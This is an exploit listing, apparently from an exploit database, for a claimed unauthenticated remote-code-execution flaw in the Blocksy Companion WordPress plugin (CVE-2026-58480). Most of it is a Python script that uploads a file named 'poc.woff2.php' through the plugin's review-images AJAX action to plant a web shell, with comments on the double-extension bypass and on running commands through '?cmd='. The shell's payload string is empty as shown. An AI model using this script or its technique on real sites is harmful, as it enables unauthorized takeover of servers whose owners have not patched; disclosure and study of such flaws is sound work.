[webapps] Blocksy Companion 2.1.46
#!/usr/bin/env python3
# Exploit Title: Blocksy Companion 2.1.46 - RCE
# CVE: CVE-2026-58480
# Date: 2026-07-13
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://creativethemes.com
# Software Link: https://wordpress.org/plugins/blocksy-companion/
# Affected: Blocksy Companion <= 2.1.46 (Pro with Advanced Reviews + Custom Fonts)
# Tested on: WordPress + Blocksy Companion 2.1.46
# Category: WebApps
# Platform: PHP
# Exploit Type: Remote Code Execution (Unauthenticated)
# CVSS: 9.8 (Critical)
# Description: Unauthenticated arbitrary file upload via blc-review-images[] parameter in save_attachments.
# Double-extension bypass (.woff2.php) due to strpos() check in Custom Fonts extension.
# Fixed in: 2.1.47
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py http://target.com
#
# Notes:
# β’ Requires Advanced Reviews and Custom Fonts extensions enabled.
# β’ Uploaded shell lands in wp-content/uploads/ (check response for exact path).
#
# How to Use
#
# Step 1:
# Run the script with target URL.
#
# Step 2:
# Use the generated shell URL with ?cmd=command (e.g. ?cmd=id)
import requests
import sys
def banner():
print(r"""
ββββββββ ββββββ ββββ ββββββ βββ ββββββ ββββ ββββββββββββββββββββ
ββββββββββββββββββββββ βββββββ βββββββββββββββββ βββββββββββββββββββββ
βββββββββββββββββββββββ βββ βββββββ βββββββββββββββββββββββββ ββββββββ
βββββββββββββββββββββββββββ βββββ βββββββββββββββββββββββββ ββββββββ
ββββββββββββ ββββββ ββββββ βββ βββ ββββββ βββ ββββββββββββββ βββ
βββββββ βββ ββββββ βββββ βββ βββ ββββββ ββββββββββββββ βββ
βββ Banyamer Security βββ
""")
if len(sys.argv) < 2:
banner()
print("Usage: python3 exploit.py ")
sys.exit(1)
banner()
target = sys.argv[1].rstrip('/')
shell_name = "poc.woff2.php"
payload = """
"""
files = {
'blc-review-images[]': (shell_name, payload, 'application/octet-stream')
}
data = {
'action': 'blc_save_review_attachments'
}
print("[+] Sending unauthenticated file upload...")
try:
r = requests.post(f"{target}/wp-admin/admin-ajax.php", files=files, data=data, timeout=15)
print(f"Status: {r.status_code}")
print(r.text[:600])
print("\n[+] If successful, check wp-content/uploads/ for the shell.")
print(f"[+] Example: {target}/wp-content/uploads/YEAR/MONTH/{shell_name}?cmd=id")
except Exception as e:
print(f"[-] Error: {e}")
How it works
Once you click Generate, Ollama reads this article and crafts 5 comprehension questions. Your answers are graded against the article content β general knowledge won't be enough. Score 70+ to count toward your certificate.
Questions are cached β you'll always get the same 5 for this article.